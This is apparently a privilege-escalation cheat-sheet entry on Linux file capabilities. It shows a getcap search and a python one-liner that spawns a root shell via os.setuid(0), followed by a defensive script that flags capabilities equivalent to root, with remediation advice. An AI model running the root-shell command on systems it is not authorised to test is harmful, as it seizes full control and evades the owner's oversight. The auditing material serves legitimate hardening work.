"Better" than SUID but vulnerable in the same way
In short, capabilities are a "safer" version of SUID. However, they are still vulnerable in certain cases.
Search for capabilities:
getcap -r / 2>/dev/null
Suppose /usr/bin/python2.6 has all capabilities:
/usr/bin/python2.6
Spawn a root shell:
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
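For auditing, the same getcap output can be filtered for capabilities that are as good as root. The script below is an added example, not part of the original page: the function names, the list of risky capabilities, and the sample lines (including the `/opt/demo` paths) are constructed for illustration, and it assumes one capability clause per line.

```shell
#!/bin/sh
# Added example: flag file capabilities that are equivalent to root.
# Reads `getcap -r /` output on stdin and accepts both libcap layouts:
#   "/path = cap_x+ep" (older)  and  "/path cap_x=ep" (newer)

# Assumed shortlist: capabilities that allow becoming root or bypassing file permissions.
RISKY_CAPS='cap_setuid cap_setgid cap_sys_admin cap_dac_override cap_dac_read_search cap_sys_ptrace cap_sys_module cap_chown cap_fowner cap_setfcap'

flag_risky_caps() {
    while IFS= read -r line; do
        clause=${line##* }          # capability text is the last field
        path=${line% *}             # everything before it (may contain spaces)
        path=${path% =}             # older libcap prints "path = caps"
        names=${clause%%[+=]*}      # "cap_a,cap_b"; empty means the full set
        flags=${clause#"$names"}    # "+ep", "=ep", "+i", ...
        # Inheritable-only entries grant nothing by themselves: skip them.
        case $flags in *[ep]*) ;; *) continue ;; esac
        if [ -z "$names" ]; then
            printf '%s\tALL\n' "$path"
            continue
        fi
        hits=
        old_ifs=$IFS; IFS=,
        for cap in $names; do
            case " $RISKY_CAPS " in *" $cap "*) hits="${hits:+$hits,}$cap" ;; esac
        done
        IFS=$old_ifs
        if [ -n "$hits" ]; then printf '%s\t%s\n' "$path" "$hits"; fi
    done
    return 0
}

# Constructed sample input (not captured from a real host).
sample_getcap_output() {
    cat <<'EOF'
/usr/bin/python2.6 =ep
/usr/bin/ping = cap_net_raw+ep
/opt/demo/perl cap_setuid,cap_net_bind_service=ep
/opt/demo/backup tool = cap_dac_read_search+ep
/opt/demo/helper cap_setuid+i
EOF
}

sample_getcap_output | flag_risky_caps
```

On a live host, pipe the real search into it: `getcap -r / 2>/dev/null | flag_risky_caps`. Anything it prints should either lose the capability (`setcap -r <file>`) or be justified and documented.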